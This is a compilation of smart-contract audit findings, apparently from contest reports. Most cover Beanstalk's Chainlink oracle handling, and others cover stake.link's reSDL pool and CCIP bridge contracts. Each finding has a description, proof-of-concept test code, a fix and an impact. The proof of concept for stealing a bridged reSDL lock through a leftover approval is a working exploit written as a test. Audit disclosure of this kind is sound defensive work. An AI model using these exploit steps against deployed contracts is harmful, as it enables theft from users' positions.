Temperature and caseId are incorrectly adjusted when oracle fails
Severity: medium
When a user calls `gm` and the call to the Chainlink oracle fails, the oracle returns 0 for the `deltaB` value. This causes a cascade effect: the `caseId` is calculated as `3`, and that incorrect `caseId` is then used to set the new temperature in Weather.sol.
```
function updateTemperature(int8 bT, uint256 caseId) private {
    uint256 t = s.w.t;
    if (bT < 0) {
        if (t <= uint256(-bT)) {
            // if (change < 0 && t <= uint32(-change)),
            // then 0 <= t <= type(int8).max because change is an int8.
            // Thus, downcasting t to an int8 will not cause overflow.
            bT = 1 - int8(t);
            s.w.t = 1;
        } else {
            s.w.t = uint32(t - uint256(-bT));
        }
    } else {
        s.w.t = uint32(t + uint256(bT));
    }

    emit TemperatureChange(s.season.current, caseId, bT);
}
```

Every consumer of the temperature in the protocol will be affected, including:
`LibDibbler.morningTemperature`
`LibDibbler.beansToPods`
`LibDibbler.remainingPods`
`Sun.setSoilAbovePeg`
`Sun.stepSun`
`FieldFacet.maxTemperature`
`FieldFacet.totalSoil`
`FieldFacet._totalSoilAndTemperature`
`FieldFacet.sowWithMin`

The `gm` function uses the incorrect deltaB (0) to calculate the `caseId`, which is then used to set the temperature.
```
function gm(address account, LibTransfer.To mode) public payable returns (uint256) {
    int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here
    uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero
    LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());
    LibGauge.stepGauge();
    stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero
}
```

Proof of concept:
Prepare the environment to work with Foundry + updated mocks: https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c
Make sure to have mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`
Create the `SeasonTemperature.t.sol` file under the `foundry` folder and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.
```
// SPDX-License-Identifier: MIT
pragma solidity =0.7.6;
pragma abicoder v2;

import { Sun } from "contracts/beanstalk/sun/SeasonFacet/Sun.sol";
import { MockSeasonFacet } from "contracts/mocks/mockFacets/MockSeasonFacet.sol";
import { MockSiloFacet } from "contracts/mocks/mockFacets/MockSiloFacet.sol";
import { MockFieldFacet } from "contracts/mocks/mockFacets/MockFieldFacet.sol";
import { MockWhitelistFacet } from "contracts/mocks/mockFacets/MockWhitelistFacet.sol";
import {LibWhitelist} from "contracts/libraries/Silo/LibWhitelist.sol";
import { Utils } from "./utils/Utils.sol";
import "./utils/TestHelper.sol";
import "contracts/libraries/LibSafeMath32.sol";
import "contracts/C.sol";

contract SeasonTemperatureTest is MockSeasonFacet, TestHelper {
    using SafeMath for uint256;
    using LibSafeMath32 for uint32;

    bool oracleFailed;

    function setUp() public {
        console.log("diamondSetup");
        vm.createSelectFork('local');
        oracleFailed = false;
        setupDiamond();
        dewhitelistCurvePool();
        mintUnripeLPToUser1();
        mintUnripeBeanToUser1();
        setOraclePrices(false, 1000e6, 1000e6, 1000e6);
        _setReservesForWell(1000000e6, 1000e18);

        // user / tokens
        mintTokenForUsers();
        setTokenApprovalForUsers();

        enableFertilizerAndMintActiveFertilizers();

        callSunriseForUser1();
    }

    //////////// Setup functions ////////////

    function setTokenApprovalForUsers() internal {
        approveTokensForUser(deployer);
        approveTokensForUser(user1);
        approveTokensForUser(user2);
        approveTokensForUser(user3);
        approveTokensForUser(user4);
        approveTokensForUser(user5);
    }

    function mintTokenForUsers() internal {
        mintWETHtoUser(deployer);
        mintWETHtoUser(user1);
        mintWETHtoUser(user2);
        mintWETHtoUser(user3);
        mintWETHtoUser(user4);
        mintWETHtoUser(user5);

        // mint C.bean() to users
        C.bean().mint(deployer, 10e6);
        C.bean().mint(user1, 10e6);
        C.bean().mint(user2, 10e6);
        C.bean().mint(user3, 10e6);
        C.bean().mint(user4, 10e6);
        C.bean().mint(user5, 10e6);
    }

    function approveTokensForUser(address user) prank(user) internal {
        mockWETH.approve(address(diamond), type(uint256).max);
        unripeLP.approve(address(diamond), type(uint256).max);
        unripeBean.approve(address(diamond), type(uint256).max);
        well.approve(address(diamond), type(uint256).max);
        C.bean().approve(address(field), type(uint256).max);
        C.bean().approve(address(field), type(uint256).max);
    }

    function dewhitelistCurvePool() public {
        vm.prank(deployer);
        whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);
    }

    function mintWETHtoUser(address user) prank(user) internal {
        mockWETH.mint(user, 1000e18);
    }

    function mintUnripeLPToUser1() internal {
        unripeLP.mint(user1, 1000e6);
    }

    function mintUnripeBeanToUser1() internal {
        unripeBean.mint(user1, 1000e6);
    }

    function enableFertilizerAndMintActiveFertilizers() internal {
        // second parameter is the unfertilizedIndex
        fertilizer.setFertilizerE(true, 10000e6);

        vm.prank(deployer);
        fertilizer.addFertilizerOwner(7500, 1e11, 99);

        vm.prank(deployer);
        fertilizer.addFertilizerOwner(6200, 1e11, 99);

        addUnripeTokensToFacet();
    }

    function addUnripeTokensToFacet() prank(deployer) internal {
        unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));
        unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));
    }

    function callSunriseForUser1() prank(user1) internal {
        _ensurePreConditions();
        _advanceInTime(2 hours);
        season.sunrise();
    }

    function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal {
        if (makeOracleFail) {
            _addEthUsdPriceChainlink(0);
            oracleFailed = true;
        } else {
            oracleFailed = false;
            _addEthUsdPriceChainlink(chainlinkPrice);
            _setEthUsdtPrice(ethUsdtPrice);
            _setEthUsdcPrice(ethUsdcPrice);
        }
    }

    ////////////////////////////////////////// TESTS //////////////////////////////////////////

    function testWrongCalcId_whenOracleFails() public {
        _prepareForAbovePeg();
        _advanceInTime(1 hours);
        uint256 _snapId = vm.snapshot();

        // When sunrise succeeds
        vm.prank(user4);
        season.sunrise();

        // Then print results
        _printProtocolState();
        assertEq(season.getT(), 5, "when succeeds t should be 5");

        // Then revert it to prepare for the season that will fail
        vm.revertTo(_snapId);

        // Prepare for the season that will fail
        setOraclePrices(true, 0, 0, 0);

        // When sunrise fails
        vm.prank(user4);
        season.sunrise();

        console.log("Oracle failed, see results");
        _printProtocolState();
        assertEq(season.getT(), 1, "when succeeds t should be 1");
    }

    function _printProtocolState() internal {
        console.log("-------------- Results --------------");
        console.log("");
        console.log("thisSowTime: ", season.thisSowTime());
        console.log("lastSowTime: ", season.lastSowTime());
        console.log("getUsdTokenPrice: ", season.getUsdTokenPrice());
        console.log("getReserve0: ", season.getReserve0());
        console.log("getReserve1: ", season.getReserve1());
        console.log("getAbovePeg: ", season.getAbovePeg());
        console.log("getSoil: ", season.getSoil());
        console.log("lastDSoil: ", season.lastDSoil());
        console.log("s.w.t: ", season.getT());
        console.log("remaining pods: ", field.remainingPods());
    }

    function _prepareForAbovePeg() internal {
        season.mockSetSopWell(address(well));
        season.captureWellE(address(well));
        season.setYieldE(5); // s.w.t
        setOraclePrices(false, 1000e6, 1000e6, 1000e6);

        season.setLastSowTimeE(1);
        season.setNextSowTimeE(10);
        season.calcCaseIdE(1e18, 1);
        season.setAbovePegE(true);
    }

    ////////////////////////////////////////// HELPERS //////////////////////////////////////////

    function _ensurePreConditions() internal {
        assertTrue(season.thisSowTime() == type(uint32).max, "thisSowTime should be max");
        assertTrue(season.lastSowTime() == type(uint32).max, "thisLastSowTime should be max");
        assertEq(season.getIsFarm(), 1, "isFarm should be 1");
        assertEq(season.getUsdTokenPrice(), 1, "usdTokenPrice should be 1");
        assertEq(season.getReserve0(), 1, "reserve0 should be 1");
        assertEq(season.getReserve1(), 1, "reserve1 should be 1");
        assertFalse(season.getAbovePeg(), "pre - abovePeg should be false");
        assertEq(season.getSoil(), 0, "soil should be == 0");
    }
}
```

Output:
```
 handleRain caseId: 0
 -------------- Results --------------

 thisSowTime: 4294967295
 lastSowTime: 4294967295
 getUsdTokenPrice: 1
 getReserve0: 1
 getReserve1: 1
 getAbovePeg: false
 getSoil: 462832752243
 lastDSoil: 0
 s.w.t: 5
 remaining pods: 467461079765

handleRain caseId: 3
 Oracle failed, see results
 -------------- Results --------------

 thisSowTime: 4294967295
 lastSowTime: 4294967295
 getUsdTokenPrice: 1
 getReserve0: 1
 getReserve1: 1
 getAbovePeg: false
 getSoil: 0
 lastDSoil: 0
 s.w.t: 1
 remaining pods: 0

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)
```

ps: a console.log was added to the `handleRain` function to print the caseId.
Result: in a normal scenario the temperature would have remained at `5`, but in this case it was set to `1`, and remaining pods/soil were also set to zero when in fact they should not be.
Recommendation: It is noticed that the developers intend never to revert the sunrise function, to reduce the risk of depeg and avoid breaking the incentive for users to call it. But at the same time, these state variables shouldn't be updated as if the system were working correctly, because they will impact the next season as stated in this finding.
It is tricky to propose a simple fix without impacting the system as a whole. Here are a few ideas that could be used:
(Recommended) An effective solution could be to store the latest response from Chainlink; if a call fails and the timeout (a limit that can be added for how long a previous oracle response is acceptable) has not been reached yet, the protocol could use the previous response. Liquity uses this approach, for example: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution is effective for the protocol because the oracle is also called in different places, such as when minting fertilizers (getMintFertilizerOut), getting the well price (getRatiosAndBeanIndex), and `getConstantProductWell`. Since the oracle is used in many places throughout the protocol, the `latest successful price` would often be up to date and within the time limit defined for falling back to a previous price when the Chainlink oracle fails.
Additionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.
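For illustration, here is a minimal sketch of that last-good-price idea. The `lastGoodPrice`/`lastGoodTimestamp` fields, the `ORACLE_FALLBACK_TIMEOUT` constant, and the `priceFeed` variable are hypothetical names, not Beanstalk's actual API; only the overall Liquity-style pattern is the point.
```
// Hypothetical sketch (Solidity 0.7.6-compatible). The import path may differ
// depending on the Chainlink package version in use.
import {AggregatorV3Interface} from "@chainlink/contracts/src/v0.7/interfaces/AggregatorV3Interface.sol";

uint256 constant ORACLE_FALLBACK_TIMEOUT = 1 hours; // illustrative limit

uint256 lastGoodPrice;     // hypothetical storage field
uint256 lastGoodTimestamp; // hypothetical storage field

function getPriceWithFallback() internal returns (uint256 price, bool failed) {
    try AggregatorV3Interface(priceFeed).latestRoundData() returns (
        uint80, int256 answer, uint256, uint256 updatedAt, uint80
    ) {
        if (answer > 0 && updatedAt != 0 && updatedAt <= block.timestamp) {
            // Fresh, valid response: remember it for future fallbacks.
            lastGoodPrice = uint256(answer);
            lastGoodTimestamp = updatedAt;
            return (uint256(answer), false);
        }
    } catch {}
    // Oracle call failed or returned invalid data: fall back to the stored
    // response only while it is still within the acceptance window.
    if (block.timestamp - lastGoodTimestamp <= ORACLE_FALLBACK_TIMEOUT) {
        return (lastGoodPrice, false);
    }
    return (0, true); // caller should skip the caseId/temperature update
}
```
With a helper like this, `stepOracle()` could signal failure explicitly instead of silently returning a `deltaB` of 0 that flows into `calcCaseIdandUpdate`.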
Impact: The interest rate will be wrongly decreased to 1, compromising the protocol's peg mechanism exactly when it needs to be maintained with a high interest rate/temperature.
Sows will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods.
The remaining pods function will return zero, and users will see an inaccurate number representing their actual pods.
`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hours
Severity: medium
The `LibChainlinkOracle` library uses a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). This duration is four times longer than the `Chainlink` heartbeat of `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.
The `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments, `timestamp`, `answer` and `currentTimestamp`, and checks whether the `answer` returned from the `Chainlink` oracle or the `timestamp` is invalid:
```
function checkForInvalidTimestampOrAnswer(
    uint256 timestamp,
    int256 answer,
    uint256 currentTimestamp
) private pure returns (bool) {
    // Check for an invalid timeStamp that is 0, or in the future
    if (timestamp == 0 || timestamp > currentTimestamp) return true;
    // Check if Chainlink's price feed has timed out
    if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;
    // Check for non-positive price
    if (answer <= 0) return true;
}
```

The function also checks whether the difference between `currentTimestamp` and `timestamp` is greater than `CHAINLINK_TIMEOUT`. `CHAINLINK_TIMEOUT` is defined as 4 hours:
```
uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4
```
Recommendation: Consider reducing `CHAINLINK_TIMEOUT` to align more closely with the `Chainlink` heartbeat on Ethereum, improving the freshness of the accepted price data.
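As a sketch, the constant could be pinned to the ETH/USD feed's 1-hour heartbeat plus a small grace period for late rounds; the exact buffer below is a design choice, not a value from the source:
```
// 1-hour Chainlink heartbeat + 15-minute grace period for late updates
uint256 public constant CHAINLINK_TIMEOUT = 3600 + 900; // 4500 seconds
```
Any buffer works as long as the total stays close to the heartbeat; note that each feed has its own heartbeat, so a per-feed timeout is safer if more feeds are added later.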
Impact: The `Chainlink` heartbeat indicates the expected frequency of updates from the oracle. The `Chainlink` heartbeat on Ethereum for `ETH/USD` is `3600` seconds (1 hour):
https://docs.chain.link/data-feeds/price-feeds/addresses?network=ethereum&page=1&search=0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419
But the `CHAINLINK_TIMEOUT` defined in `LibChainlinkOracle` is `14400` seconds (4 hours).
A `CHAINLINK_TIMEOUT` significantly longer than the heartbeat can lead to scenarios where the `LibChainlinkOracle` library accepts data that no longer reflects current market conditions. In volatile markets, a 4-hour window means accepting outdated prices, increasing the risk of price slippage.
[M] DOS in LibChainlinkOracle when not considering phaseId
Severity: medium
`LibChainlinkOracle` is not fully compatible with Chainlink's data model because it lacks support for `phaseId` and `aggregatorRoundId`. Chainlink's `roundId` is a composite number combining a `phaseId` and an `aggregatorRoundId`.
The `phaseId` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in `roundId` values due to the bit-shifting operation described in the documentation: https://docs.chain.link/data-feeds/historical-data#solidity
The Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundId` as sequential, overlooking Chainlink's bundling of `phaseId` and `aggregatorRoundId`. When the `phaseId` advances, `roundId` jumps by 2^64, leading to a temporal suspension until a new interval commences. This creates a denial-of-service scenario. The `getEthUsdTwap` and `getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which in turn affects any calls reliant on oracle data.
```
function getRoundData(uint80 _roundId)
    public
    view
    virtual
    override
    returns (
        uint80 roundId,
        int256 answer,
        uint256 startedAt,
        uint256 updatedAt,
        uint80 answeredInRound
    )
{
    (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);

    (
        uint80 roundId,
        int256 answer,
        uint256 startedAt,
        uint256 updatedAt,
        uint80 ansIn
    ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);

    return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);
}
```

```
function latestRoundData()
    public
    view
    virtual
    override
    returns (
        uint80 roundId,
        int256 answer,
        uint256 startedAt,
        uint256 updatedAt,
        uint80 answeredInRound
    )
{
    Phase memory current = currentPhase; // cache storage reads

    (
        uint80 roundId,
        int256 answer,
        uint256 startedAt,
        uint256 updatedAt,
        uint80 ansIn
    ) = current.aggregator.latestRoundData();

    return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);
}
```

https://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code
The code above, extracted from the ETH/USD Chainlink aggregator, highlights the composite structure of `roundId`, integrating both `phaseId` and `aggregatorRoundId`. As highlighted, an increment in `phaseId` leads to a jump in `roundId` by 2^64, thereby skipping a number of "rounds." Consequently, any attempt to query `currentRound - 1` post-upgrade encounters a non-existent round, triggering a revert. This condition could persist up to 24 hours depending on configuration, impacting the timely execution of `getEthUsdTwap` and `getEthUsdPrice`.
These functions, once operational again, might use altered TWAP values for their computations, diverging from expected outcomes.
Recommendation: Check the return values around `roundId`. If a query for a previous `roundId` reverts even though the current `roundId` is nonzero (i.e., the round does not exist because `phaseId` was incremented), the oracle logic needs to retry against a lower `phaseId` rather than assume round ids are sequential.
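A sketch of one defensive pattern follows, assuming Chainlink's standard `AggregatorV3Interface`. The helper names are illustrative, and discovering the last usable round of the previous phase still requires probing downward, which this sketch only signals to the caller:
```
import {AggregatorV3Interface} from "@chainlink/contracts/src/v0.8/interfaces/AggregatorV3Interface.sol";

// Step back one round, handling a phaseId boundary. The packing mirrors
// Chainlink's documented layout: roundId = (phaseId << 64) | aggregatorRoundId.
function previousRoundId(uint80 roundId) internal pure returns (uint80) {
    uint16 phaseId = uint16(roundId >> 64);
    uint64 aggregatorRoundId = uint64(roundId);
    if (aggregatorRoundId > 1) {
        return (uint80(phaseId) << 64) | (aggregatorRoundId - 1);
    }
    // First round of this phase: jump to the previous phase. The actual last
    // aggregatorRoundId of that phase must be found by probing downward.
    return (uint80(phaseId - 1) << 64) | type(uint64).max;
}

// Wrap getRoundData so a non-existent round reports failure instead of
// reverting the whole TWAP computation.
function tryGetRoundData(AggregatorV3Interface feed, uint80 roundId)
    internal view returns (bool ok, int256 answer, uint256 updatedAt)
{
    try feed.getRoundData(roundId) returns (
        uint80, int256 a, uint256, uint256 u, uint80
    ) {
        return (u != 0 && a > 0, a, u);
    } catch {
        return (false, 0, 0); // missing round: caller should probe lower ids
    }
}
```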
Impact: If a `phaseId` increment occurs, it results in a jump in `roundId` values, creating a gap in the sequence. Attempts to access round data for `roundId`s within this gap will encounter non-existent rounds, potentially causing the function to fail or return incorrect data, since when the `phaseId` is incremented the `roundId` increases by 2^64. This discrepancy can lead to a denial of service in any calls to the oracle.
A user can steal an already transferred and bridged reSDL lock because of approval
Severity: high
The reSDL token approval is not deleted when the lock is bridged to another chain.
When a reSDL token is bridged to another chain, the `handleOutgoingRESDL()` function is called to make the state changes in the `sdlPool` contract. The function executes the following:
```
function handleOutgoingRESDL(
    address _sender,
    uint256 _lockId,
    address _sdlReceiver
)
    external
    onlyCCIPController
    onlyLockOwner(_lockId, _sender)
    updateRewards(_sender)
    updateRewards(ccipController)
    returns (Lock memory)
{
    Lock memory lock = locks[_lockId];

    delete locks[_lockId].amount;
    delete lockOwners[_lockId];
    balances[_sender] -= 1;

    uint256 totalAmount = lock.amount + lock.boostAmount;
    effectiveBalances[_sender] -= totalAmount;
    effectiveBalances[ccipController] += totalAmount;

    sdlToken.safeTransfer(_sdlReceiver, lock.amount);

    emit OutgoingRESDL(_sender, _lockId);

    return lock;
}
```

As we can see, it deletes the lock amount of the lockId, removes the ownership of the lock, and decrements the lock balance of the account that is bridging the lock. However, the approval the user set before bridging the reSDL lock remains, and he can exploit it to steal the NFT. Consider the following situation: a user knows there is a victim willing to pay the underlying value for a reSDL lock ownership transfer. The malicious user sets approval to move his lockId, on all supported chains, to an alt address that he owns. Then he trades the underlying value for the reSDL ownership, and the lock is transferred to the victim/buyer. If the buyer keeps the lock on this chain nothing happens, but if he bridges to any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.
Proof of concept (it is written inside `resdl-token-bridge.test.ts` because it uses its setup):
```
it('PoC steal reSDL', async () => {
  let lockId = 2

  let thief = accounts[0]
  let victim = accounts[1]

  let thiefAccount2 = accounts[2]

  let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp

  // Thief approves an alt account that he controls to move his lock in the original chain
  await sdlPool.approve(thiefAccount2, lockId)

  assert.equal(await sdlPool.getApproved(2), thiefAccount2);

  // Thief bridges the lock to another chain but the approval is not deleted
  await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })
  let lastRequestMsg = await onRamp.getLastRequestMessage()
  assert.deepEqual(
    ethers.utils.defaultAbiCoder
      .decode(
        ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],
        lastRequestMsg[1]
      )
      .map((d, i) => {
        if (i == 0) return d
        if (i > 1 && i < 4) return fromEther(d)
        return d.toNumber()
      }),
    [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]
  )
  assert.deepEqual(
    lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),
    [[sdlToken.address, 1000]]
  )
  assert.equal(lastRequestMsg[3], wrappedNative.address)
  assert.equal(lastRequestMsg[4], '0x11')
  await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')

  // The user that received the lock from bridging on the other chain decides to bridge the lock id
  // back to the original chain
  await offRamp
    .connect(signers[6])
    .executeSingleMessage(
      ethers.utils.formatBytes32String('messageId'),
      77,
      ethers.utils.defaultAbiCoder.encode(
        ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],
        [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]
      ),
      sdlPoolCCIPController.address,
      [{ token: sdlToken.address, amount: toEther(25) }]
    )

  // Now the victim owns the reSDL lock on the original chain
  assert.equal(await sdlPool.ownerOf(2), victim)

  // However, this lockId still has the approval that the thief originally set
  // to his alt account, and the victim does not know that
  assert.equal(await sdlPool.getApproved(2), thiefAccount2);

  // Thief transfers the reSDL back to his main account via his alt account
  await sdlPool
    .connect(signers[2])
    .transferFrom(victim, thief, lockId)

  // Thief is now the owner of the reSDL
  assert.equal(await sdlPool.ownerOf(2), thief)
})
```
Recommendation: When bridging a lock between chains, the lock approval should be deleted (added line marked with `+`):
```
function handleOutgoingRESDL(
    address _sender,
    uint256 _lockId,
    address _sdlReceiver
)
    external
    onlyCCIPController
    onlyLockOwner(_lockId, _sender)
    updateRewards(_sender)
    updateRewards(ccipController)
    returns (Lock memory)
{
    Lock memory lock = locks[_lockId];

    delete locks[_lockId].amount;
    delete lockOwners[_lockId];
    balances[_sender] -= 1;
+   delete tokenApprovals[_lockId];

    uint256 totalAmount = lock.amount + lock.boostAmount;
    effectiveBalances[_sender] -= totalAmount;
    effectiveBalances[ccipController] += totalAmount;

    sdlToken.safeTransfer(_sdlReceiver, lock.amount);

    emit OutgoingRESDL(_sender, _lockId);

    return lock;
}
```
Impact: High, possibility to steal funds.
Insufficient gas limit specification for cross-chain transfers in `_buildCCIPMessage()` (WrappedTokenBridge.sol#210)
Severity: low
The `_buildCCIPMessage()` function in the `WrappedTokenBridge` contract does not specify a `gasLimit` for the execution of the `ccipReceive()` function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.
The `Client.EVM2AnyMessage` struct created by `_buildCCIPMessage()` defines the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a `gasLimit` field in the `extraArgs`, which is crucial for determining the maximum amount of gas that can be consumed when the `ccipReceive()` function is called on the destination chain.
Without a specified `gasLimit`, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. This default may not align with the actual gas requirements of the `ccipReceive()` function, potentially leading to failed transactions or higher-than-expected fees.
```
function _buildCCIPMessage(
    address _receiver,
    uint256 _amount,
    address _feeTokenAddress
) internal view returns (Client.EVM2AnyMessage memory) {
    Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount[](1);
    Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount});
    tokenAmounts[0] = tokenAmount;

    Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({
        receiver: abi.encode(_receiver),
        data: "",
        tokenAmounts: tokenAmounts,
        extraArgs: "0x",
        feeToken: _feeTokenAddress
    });

    return evm2AnyMessage;
}
```
Recommendation: To address the missing `gasLimit` in the `_transferTokens` flow, we can take inspiration from the `sendMessage()` example and modify the `_buildCCIPMessage` function within the `WrappedTokenBridge` contract to include a `gasLimit` in the `extraArgs` field of the `EVM2AnyMessage` struct. This ensures that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the `ccipReceive()` function.
```
function _buildCCIPMessage(
    address _receiver,
    uint256 _amount,
    address _feeTokenAddress
) internal view returns (Client.EVM2AnyMessage memory) {
    Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount[](1);
    Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({
        token: address(wrappedToken),
        amount: _amount
    });
    tokenAmounts[0] = tokenAmount;

    // Include a gasLimit in the extraArgs
    Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({
        receiver: abi.encode(_receiver),
        data: "",
        tokenAmounts: tokenAmounts,
        extraArgs: Client._argsToBytes(
            // Additional arguments, setting gas limit and non-strict sequencing mode
            Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false})
        ),
        feeToken: _feeTokenAddress
    });

    return evm2AnyMessage;
}
```

This includes a `gasLimit` field, set to 200,000 in this example. The value should be adjusted based on the expected gas consumption of the `ccipReceive()` function on the destination chain. By including the `gasLimit` in the `extraArgs`, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.
Impact: If the default gas limit is too low, the `ccipReceive()` function may run out of gas, causing the transaction to fail on the destination chain.
Without a specified `gasLimit`, the cost of sending a message can vary, making it difficult for users to predict the required fees.
If the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.
Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.
Severity: low
`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.
This can lead to the `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerSecondary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.
The `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`; `SDLPoolCCIPControllerPrimary` inherits from `SDLPoolCCIPController`, which inherits `Ownable`; and `SDLPoolCCIPControllerSecondary` inherits from `SDLPoolCCIPControllerPrimary`. Hence all of them inherit the `renounceOwnership()` function.
The owner could accidentally (or intentionally) call `renounceOwnership()`, which transfers ownership to `address(0)`. This will break numerous functions within each referenced contract that carry the `onlyOwner` modifier. Below is a list of those functions:
`SDLPoolCCIPControllerPrimary`
- `setRewardsInitiator()`
- `setWrappedRewardToken()`
- `approveRewardTokens()`
- `removeWhitelistedChain()`
- `addWhitelistedChain()`
`SDLPoolCCIPControllerSecondary`
- `setExtraArgs()`
`WrappedTokenBridge`
- `recoverTokens()`
- `transferTokens()`
`LinearBoostController`
- `setMaxLockingDuration()`
- `setMaxBoost()`
`RESDLTokenBridge`
- `setExtraArgs()`

POC: add this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`:
```
it.only('renounce ownership', async () => {
  console.log("Owner before", await controller.owner())
  // set max link fee
  await controller.setMaxLINKFee(toEther(100))
  // console out the max link fee
  console.log("Set max link fee with onlyOwner modifier", await controller.maxLINKFee())

  // renounce ownership using renounceOwnership() from owner contract
  await expect(controller.renounceOwnership())
  // set max link fee and expect revert
  await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')
  // console out the max link fee
  console.log("set max link fee hasn't changed", await controller.maxLINKFee())
  // console out the owner
  console.log("Owner after", await controller.owner())
})
```
Recommendation: Disable `renounceOwnership()` by overriding it if the function is not required (added lines marked with `+`):
```
+ function renounceOwnership() public override onlyOwner {
+     revert("Not allowed");
+ }
```
No way to revoke approval in the SDLPool might lead to unauthorized lock transfers
Severity: medium
There is no way to revoke an approval given via the `approve` function, so an operator may be able to execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.
The `setApprovalForAll` function allows the owner to approve anyone as an operator:
```
function setApprovalForAll(address _operator, bool _approved) external {
    address owner = msg.sender;
    if (owner == _operator) revert ApprovalToCaller();

    operatorApprovals[owner][_operator] = _approved;
    emit ApprovalForAll(owner, _operator, _approved);
}
```

In the same vein, the `approve` function allows the owner or an operator to approve anyone to transfer the lock:
```
function approve(address _to, uint256 _lockId) external {
    address owner = ownerOf(_lockId);

    if (_to == owner) revert ApprovalToCurrentOwner(); //@note
    if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();

    tokenApprovals[_lockId] = _to;
    emit Approval(owner, _to, _lockId);
}
```

Note that in this function a lock cannot be approved to the owner (but can be approved to any of the operators), and the function can be called by the owner or an operator (see the `isApprovedForAll` check).
If an operator approves himself to a lock using the `approve` function, and later on his operator status gets revoked, his lock approval status is not cleared, meaning he still has access to the lock.
As an extreme example:
1. User1 owns 5 locks.
2. He calls `setApprovalForAll`, setting User2 as his operator.
3. User2 calls the `approve` function on all 5 locks (it succeeds, as there's no check preventing this, unlike with the lock owner), getting herself both operator approval and token approvals.
4. User1 revokes User2's operator status.
5. User2 still has access to the locks and can transfer them.
Recommendation: Include a check in the `approve` function to see whether `_to` is an operator, and revert if it is. Alternatively, clear an operator's token approvals when revoking his operator status.
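A minimal sketch of the first option, reusing the SDLPool storage and error style shown above; the `ApprovalToOperator` error is a hypothetical addition:
```
error ApprovalToOperator(); // hypothetical new error

function approve(address _to, uint256 _lockId) external {
    address owner = ownerOf(_lockId);

    if (_to == owner) revert ApprovalToCurrentOwner();
    // New check: operators already have transfer rights, so granting them a
    // per-lock approval would let that approval outlive an operator revocation.
    if (isApprovedForAll(owner, _to)) revert ApprovalToOperator();
    if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();

    tokenApprovals[_lockId] = _to;
    emit Approval(owner, _to, _lockId);
}
```
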